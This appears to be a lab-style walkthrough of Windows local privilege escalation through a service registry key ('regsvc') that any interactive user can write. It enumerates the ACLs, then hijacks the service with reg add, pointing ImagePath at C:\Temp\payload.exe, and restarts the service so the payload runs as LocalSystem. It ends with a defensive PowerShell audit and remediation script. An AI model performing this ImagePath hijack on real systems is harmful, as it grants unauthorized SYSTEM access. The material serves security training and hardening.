Query the service's registry key:

1) reg query HKLM\SYSTEM\CurrentControlSet\Services\regsvc

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
DisplayName REG_SZ Insecure Registry Service
ObjectName REG_SZ LocalSystem

Get the ACL on the registry key via PowerShell:

2a) powershell -exec bypass -c "Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\regsvc | Format-List"

Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : Everyone Allow ReadKey
NT AUTHORITY\INTERACTIVE Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
Audit :
Sddl : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)

or via Sysinternals AccessChk (note the NT AUTHORITY\INTERACTIVE entry with KEY_ALL_ACCESS, which is what makes the key writable by any locally logged-on user):

2b) accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS

Last, check whether the service itself can be started and stopped by the current user (the service DACL is separate from the registry key DACL):

3) accesschk.exe /accepteula -ucqv regsvc

regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM

SERVICE_START
SERVICE_STOP

Change ImagePath to point at the payload:

4) reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\payload.exe /f

and restart the service so the new ImagePath is executed under the ObjectName account (LocalSystem here):

net stop regsvc

net start regsvc
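Steps 1 through 3 above are done by hand for one service. The following script is an added example, not part of the original walkthrough, that runs the same registry-key check across every service at once from the defender's side: it flags any service key where a low-privilege principal holds rights that allow rewriting ImagePath, and offers a function to strip such explicit ACEs. The principal list ($LowPrivSids), the rights set ($WriteRights) and the function names Find-WritableServiceKey and Remove-LowPrivWriteAce are this example's own assumptions.

```powershell
# Added example: audit HKLM\SYSTEM\CurrentControlSet\Services for service keys
# writable by non-admin principals (the weakness shown for regsvc above).
# SID list, rights set and function names are assumptions of this example.

# Well-known SIDs that an ordinary local logon session holds. (assumed list)
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'NT AUTHORITY\INTERACTIVE'
    'S-1-5-11'     = 'NT AUTHORITY\Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

# Registry rights that let the holder change ImagePath or the DACL itself.
$WriteRights = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                     [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                     [System.Security.AccessControl.RegistryRights]::WriteKey -bor
                     [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                     [System.Security.AccessControl.RegistryRights]::TakeOwnership -bor
                     [System.Security.AccessControl.RegistryRights]::FullControl)

function Find-WritableServiceKey {
    [CmdletBinding()]
    param(
        [string]$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    )

    foreach ($key in Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }

        # Request SIDs instead of names so the comparison is locale-independent.
        foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            $sid = $ace.IdentityReference.Value
            if ($ace.AccessControlType -ne 'Allow')              { continue }
            if (-not $LowPrivSids.ContainsKey($sid))              { continue }
            if (([int]$ace.RegistryRights -band $WriteRights) -eq 0) { continue }

            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $LowPrivSids[$sid]
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                ImagePath = $props.ImagePath
                RunsAs    = $props.ObjectName   # LocalSystem = highest impact
            }
        }
    }
}

# Remediation: drop explicit Allow ACEs that give low-privilege SIDs write rights.
# Inherited ACEs are left alone; those must be fixed on the parent key.
function Remove-LowPrivWriteAce {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$ServiceName)

    $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    $acl  = Get-Acl -Path $path
    foreach ($ace in $acl.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $LowPrivSids.ContainsKey($ace.IdentityReference.Value) -and
            (([int]$ace.RegistryRights -band $WriteRights) -ne 0)) {
            [void]$acl.RemoveAccessRule($ace)
        }
    }
    Set-Acl -Path $path -AclObject $acl
}

# Usage: list findings, most dangerous (LocalSystem) first.
Find-WritableServiceKey | Sort-Object RunsAs, Service | Format-Table -AutoSize
```

On a host configured like the one above, the audit reports regsvc with NT AUTHORITY\INTERACTIVE holding FullControl and RunsAs LocalSystem, which is exactly the combination steps 1 and 2 exposed. Remove-LowPrivWriteAce needs an elevated shell, since Set-Acl on a service key requires administrator rights. The service-level start/stop permission from step 3 is a different object; to review it without AccessChk, sc.exe sdshow <service> prints the service DACL as an SDDL string.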
